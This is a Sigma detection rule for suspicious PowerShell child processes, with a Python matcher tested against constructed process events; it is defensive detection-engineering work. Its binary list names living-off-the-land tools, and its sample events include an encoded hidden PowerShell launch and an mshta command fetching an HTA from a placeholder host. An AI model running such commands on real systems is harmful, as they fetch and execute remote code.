Potentially Suspicious PowerShell Child Processes

Detects potentially suspicious child processes spawned by PowerShell

Sigma rule (View on GitHub)

title: Potentially Suspicious PowerShell Child Processes
id: e4b6d2a7-d8a4-4f19-acbd-943c16d90647
status: test
description: Detects potentially suspicious child processes spawned by PowerShell
references:
    - https://twitter.com/ankit_anubhav/status/1518835408502620162
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2022/04/26
modified: 2023/05/30
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\powershell_ise.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
        Image|endswith:
            - '\bash.exe'
            - '\bitsadmin.exe'
            - '\certutil.exe'
            - '\cscript.exe'
            - '\forfiles.exe'
            - '\hh.exe'
            - '\mshta.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\schtasks.exe'
            - '\scrcons.exe'
            - '\scriptrunner.exe'
            - '\sh.exe'
            - '\wmic.exe'
            - '\wscript.exe'
    filter_optional_amazon:
        ParentCommandLine|contains: '\Program Files\Amazon\WorkspacesConfig\Scripts\'  # AWS Workspaces
        CommandLine|contains: '\Program Files\Amazon\WorkspacesConfig\Scripts\'  # AWS Workspaces
    condition: selection and not 1 of filter_optional_*
falsepositives:
    - Some false positives are to be expected from PowerShell scripts that make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed.
level: high
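To see exactly what the rule above fires on, here is a small matcher that implements its detection block and runs it over constructed process_creation events. This is an added example, not code from the Sigma project or from the rule authors. It assumes the Sigma process_creation field names (Image, ParentImage, CommandLine, ParentCommandLine), applies the case-insensitive string comparison Sigma specifies for its modifiers, and uses invented event data; the paths and command lines are constructed for illustration and are not real telemetry.

```python
"""Reference matcher for the Sigma rule above, run over constructed events.

Added example: not the Sigma project's code. Field names follow the Sigma
process_creation taxonomy; the events below are constructed, not real logs.
"""

# selection: ParentImage|endswith
PARENT_IMAGES = ('\\powershell_ise.exe', '\\powershell.exe', '\\pwsh.exe')

# selection: Image|endswith
CHILD_IMAGES = (
    '\\bash.exe', '\\bitsadmin.exe', '\\certutil.exe', '\\cscript.exe',
    '\\forfiles.exe', '\\hh.exe', '\\mshta.exe', '\\regsvr32.exe',
    '\\rundll32.exe', '\\schtasks.exe', '\\scrcons.exe', '\\scriptrunner.exe',
    '\\sh.exe', '\\wmic.exe', '\\wscript.exe',
)

# filter_optional_amazon: both ParentCommandLine and CommandLine must contain this
AWS_WORKSPACES_PATH = '\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\'


def _endswith_any(value, suffixes):
    # Sigma string modifiers compare case-insensitively by default.
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains(value, needle):
    return needle.lower() in value.lower()


def selection(event):
    """Both keys inside one Sigma map are ANDed: parent AND child must match."""
    return (_endswith_any(event.get('ParentImage', ''), PARENT_IMAGES)
            and _endswith_any(event.get('Image', ''), CHILD_IMAGES))


def filter_optional_amazon(event):
    """The filter only applies when BOTH command lines point into the AWS script dir."""
    return (_contains(event.get('ParentCommandLine', ''), AWS_WORKSPACES_PATH)
            and _contains(event.get('CommandLine', ''), AWS_WORKSPACES_PATH))


def matches(event):
    """condition: selection and not 1 of filter_optional_*"""
    return selection(event) and not filter_optional_amazon(event)


# Constructed sample events (hypothetical paths and command lines).
PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
EVENTS = [
    {'id': 'ps-mshta', 'ParentImage': PS, 'ParentCommandLine': 'powershell.exe -w hidden -enc AAAA',
     'Image': 'C:\\Windows\\System32\\mshta.exe',
     'CommandLine': 'mshta.exe http://example.invalid/a.hta'},
    {'id': 'ps-notepad', 'ParentImage': PS, 'ParentCommandLine': 'powershell.exe',
     'Image': 'C:\\Windows\\System32\\notepad.exe', 'CommandLine': 'notepad.exe'},
    {'id': 'cmd-rundll32', 'ParentImage': 'C:\\Windows\\System32\\cmd.exe',
     'ParentCommandLine': 'cmd.exe /c run.bat',
     'Image': 'C:\\Windows\\System32\\rundll32.exe', 'CommandLine': 'rundll32.exe x.dll,Go'},
    # Upper-case paths: must still match because Sigma compares case-insensitively.
    {'id': 'pwsh-bash-upper', 'ParentImage': 'C:\\PROGRAM FILES\\POWERSHELL\\7\\PWSH.EXE',
     'ParentCommandLine': 'PWSH.EXE -C bash', 'Image': 'C:\\WINDOWS\\SYSTEM32\\BASH.EXE',
     'CommandLine': 'BASH.EXE -c id'},
    # Filtered: both command lines reference the AWS WorkSpaces script directory.
    {'id': 'aws-workspaces', 'ParentImage': PS,
     'ParentCommandLine': 'powershell.exe -File "C:\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\Setup.ps1"',
     'Image': 'C:\\Windows\\System32\\wscript.exe',
     'CommandLine': 'wscript.exe "C:\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\Helper.vbs"'},
    # Not filtered: only the parent references the AWS path, the child runs an arbitrary script.
    {'id': 'aws-parent-only', 'ParentImage': PS,
     'ParentCommandLine': 'powershell.exe -File "C:\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\Setup.ps1"',
     'Image': 'C:\\Windows\\System32\\wscript.exe',
     'CommandLine': 'wscript.exe C:\\Users\\Public\\payload.vbs'},
]


def run(events):
    """Return the ids of events the rule would alert on."""
    return [e['id'] for e in events if matches(e)]


if __name__ == '__main__':
    for event_id in run(EVENTS):
        print('ALERT', event_id)
```

The two AWS events show why the filter has two keys: a child that merely has an AWS WorkSpaces parent is not excluded unless its own command line also points into that script directory, so a script dropped elsewhere and launched from that parent still alerts. When you add your own filter_optional_* maps for known-good scripts, keep the same shape (constrain both the parent and the child) rather than excluding every child of a trusted parent.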
